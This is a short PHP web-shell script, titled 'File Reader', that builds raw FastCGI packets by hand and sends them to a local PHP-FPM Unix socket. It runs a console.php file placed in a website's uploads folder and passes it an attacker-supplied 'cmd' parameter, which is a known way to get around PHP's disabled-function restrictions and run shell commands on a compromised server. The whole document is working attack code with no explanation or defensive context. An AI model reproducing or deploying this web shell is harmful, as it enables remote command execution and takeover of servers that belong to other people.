📖 File Reader
<?php
function exec_cmd($cmd = null) {
$socketPath = '/tmp/php-cgi-73.sock';
$scriptFile = '/www/wwwroot/hljrlsj.com/public/uploads/file/20260310/console.php';
echo "<b>Socket:</b> $socketPath<br>";
echo "<b>Target:</b> $scriptFile<br>";
echo "<b>Cmd:</b> " . htmlspecialchars($cmd) . "<br><br>";
$socket = @stream_socket_client("unix://$socketPath", $errno, $errstr, 5);
if (!$socket) {
return "❌ SOCKET ERROR: $errstr ($errno)<br>
<b>Check:</b> ls -la /tmp/php-cgi-73.sock<br>
<b>Or:</b> netstat -lnxp | grep php";
}
echo "✅ Socket connected<br>";
stream_set_timeout($socket, 10);
// Simplified test - just BEGIN_REQUEST + minimal params
$beginRequest = pack('CCnnCa*', 1, 1, 1, 8, 0, pack('NN', 0, 1));
fwrite($socket, $beginRequest);
// Basic params only
$params = [
'SCRIPT_FILENAME' => $scriptFile,
'REQUEST_URI' => '/console.php?cmd=' . urlencode($cmd),
'REQUEST_METHOD' => 'GET'
];
foreach ($params as $n => $v) {
$nl = strlen($n); $vl = strlen($v);
$nameLen = $nl < 128 ? chr($nl) : "\x80" . pack('N', $nl);
$valLen = $vl < 128 ? chr($vl) : "\x80" . pack('N', $vl);
$data = $nameLen . $valLen . $n . $v;
$pad = (8 - (strlen($data) % 8)) % 8;
fwrite($socket, pack('CCnnC', 1, 4, 1, strlen($data), $pad) . $data . str_repeat(chr(0), $pad));
}
// Terminators
fwrite($socket, pack('CCnnC', 1, 4, 1, 0, 0)); // PARAMS end
fwrite($socket, pack('CCnnC', 1, 5, 1, 0, 0)); // STDIN end
echo "📤 Packets sent<br>";
$output = '';
$start = time();
while (!feof($socket) && (time() - $start) < 8) {
$data = fread($socket, 8192);
$output .= bin2hex($data) . ' | ' . htmlspecialchars($data) . "\n";
}
fclose($socket);
return $output ?: "❌ No response - check console.php handles ?cmd= param";
}
$cmd = $_GET['cmd'] ?? $_POST['cmd'] ?? 'id';
echo '<pre>' . exec_cmd($cmd) . '</pre>';
?>